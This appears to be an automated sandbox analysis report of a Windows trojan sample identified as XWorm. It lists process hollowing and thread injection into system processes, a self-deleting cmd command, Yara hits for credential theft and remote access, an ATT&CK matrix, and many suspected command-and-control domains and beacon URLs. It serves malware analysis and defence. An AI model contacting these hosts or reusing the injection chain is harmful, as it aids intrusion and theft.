          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection unmapped: C:\Windows\System32\cmd.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FD0000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\svchost.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\svchost.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\cmd.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\System32\cmd.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4C01008Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: explorer.exe, 00000006.00000000.2134613895.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4561547530.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2133111600.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
          Source: explorer.exe, 00000006.00000000.2133444027.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4562162847.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000003.3075903559.00000000098C4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076035340.00000000098E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: GetLocaleInfoEx,0_2_00007FF67FAD8FB0
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: GetLocaleInfoEx,0_2_00007FF67FAD9080
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: 0_2_00007FF67FA50030 GetSystemTimeAsFileTime,0_2_00007FF67FA50030

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00FDF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,7_2_00FDF160
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          3
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts812
          Process Injection
          1
          Access Token Manipulation
          LSASS Memory231
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          812
          Process Injection
          Security Account Manager3
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials213
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529801 Sample: Iifpj4i2kC.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 34 www.zbbnp.xyz 2->34 36 www.a1b5v.xyz 2->36 38 17 other IPs or domains 2->38 44 Multi AV Scanner detection for domain / URL 2->44 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 52 5 other signatures 2->52 11 Iifpj4i2kC.exe 1 2->11         started        signatures3 50 Performs DNS queries to domains with low reputation 36->50 process4 signatures5 56 Writes to foreign memory regions 11->56 58 Allocates memory in foreign processes 11->58 60 Sample uses process hollowing technique 11->60 62 Injects a PE file into a foreign processes 11->62 14 csc.exe 11->14         started        17 conhost.exe 11->17         started        19 svchost.exe 11->19         started        21 cmd.exe 11->21         started        process6 signatures7 72 Modifies the context of a thread in another process (thread injection) 14->72 74 Maps a DLL or memory area into another process 14->74 76 Sample uses process hollowing technique 14->76 78 3 other signatures 14->78 23 explorer.exe 58 1 14->23 injected process8 dnsIp9 40 cbmsource-web-5091.rejcdn.com 104.18.14.105, 49988, 80 CLOUDFLARENETUS United States 23->40 42 www.wshifen.com 103.235.47.188, 49900, 80 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd Hong Kong 23->42 54 System process connects to network (likely due to code injection or exploit) 23->54 27 wlanext.exe 23->27         started        signatures10 process11 signatures12 64 Modifies the context of a thread in another process (thread injection) 27->64 66 Maps a DLL or memory area into another process 27->66 68 Tries to detect virtualization through RDTSC time measurements 27->68 70 Switches to a custom stack to bypass stack traces 27->70 30 cmd.exe 1 27->30         started        process13 process14 32 conhost.exe 30->32         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Iifpj4i2kC.exe55%ReversingLabsWin64.Trojan.XWorm
          Iifpj4i2kC.exe71%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.onsen1508.com1%VirustotalBrowse
          barnesassetrecovery.store1%VirustotalBrowse
          www.wshifen.com0%VirustotalBrowse
          partymaxclubmen36.click3%VirustotalBrowse
          pixie.porkbun.com0%VirustotalBrowse
          www.lynxpire.com2%VirustotalBrowse
          www.chiri.lat0%VirustotalBrowse
          www.partymaxclubmen36.click0%VirustotalBrowse
          www.rslotrank.win0%VirustotalBrowse
          www.teplo-invest.com0%VirustotalBrowse
          www.zruypj169g.top2%VirustotalBrowse
          www.barnesassetrecovery.store2%VirustotalBrowse
          www.tdshomesolution.com0%VirustotalBrowse
          www.a1b5v.xyz2%VirustotalBrowse
          www.33mgbet.com0%VirustotalBrowse
          www.zbbnp.xyz1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/v1/news/Feed/Windows?0%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
          http://www.rslotrank.win0%VirustotalBrowse
          http://www.a1b5v.xyz2%VirustotalBrowse
          http://www.33mgbet.com/md02/1%VirustotalBrowse
          http://www.33mgbet.com0%VirustotalBrowse
          http://www.upcyclecharms.com/md02/www.hecxion.xyz7%VirustotalBrowse
          http://www.mamasprinkleofjoy.com0%VirustotalBrowse
          http://www.hecxion.xyz/md02/www.mamasprinkleofjoy.com1%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          cbmsource-web-5091.rejcdn.com
          104.18.14.105
          truetrue
            unknown
            www.onsen1508.com
            118.27.100.151
            truetrueunknown
            barnesassetrecovery.store
            3.33.130.190
            truetrueunknown
            www.wshifen.com
            103.235.47.188
            truetrueunknown
            partymaxclubmen36.click
            172.96.187.89
            truetrueunknown
            pixie.porkbun.com
            44.227.65.245
            truetrueunknown
            www.lynxpire.com
            unknown
            unknowntrueunknown
            www.zbbnp.xyz
            unknown
            unknowntrueunknown
            www.chiri.lat
            unknown
            unknowntrueunknown
            www.a1b5v.xyz
            unknown
            unknowntrueunknown
            www.rslotrank.win
            unknown
            unknowntrueunknown
            www.zruypj169g.top
            unknown
            unknowntrueunknown
            www.barnesassetrecovery.store
            unknown
            unknowntrueunknown
            www.partymaxclubmen36.click
            unknown
            unknowntrueunknown
            www.teplo-invest.com
            unknown
            unknowntrueunknown
            www.33mgbet.com
            unknown
            unknowntrueunknown
            www.tdshomesolution.com
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==true
              unknown
              http://www.33mgbet.com/md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFntrue
                unknown
                www.upcyclecharms.com/md02/true
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.teplo-invest.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    http://www.mamasprinkleofjoy.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      http://www.rslotrank.winexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Iifpj4i2kC.exefalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        http://www.a1b5v.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        http://www.chiri.latReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.33mgbet.com/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          http://www.tdshomesolution.com/md02/www.onsen1508.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://word.office.comMexplorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              http://www.rakring.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://www.33mgbet.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.hecxion.xyz/md02/www.mamasprinkleofjoy.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    http://www.onsen1508.com/md02/www.barnesassetrecovery.storeexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.zbbnp.xyzReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.rslotrank.winReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.rslotrank.win/md02/www.partymaxclubmen36.clickexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.upcyclecharms.com/md02/www.hecxion.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            http://www.mamasprinkleofjoy.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
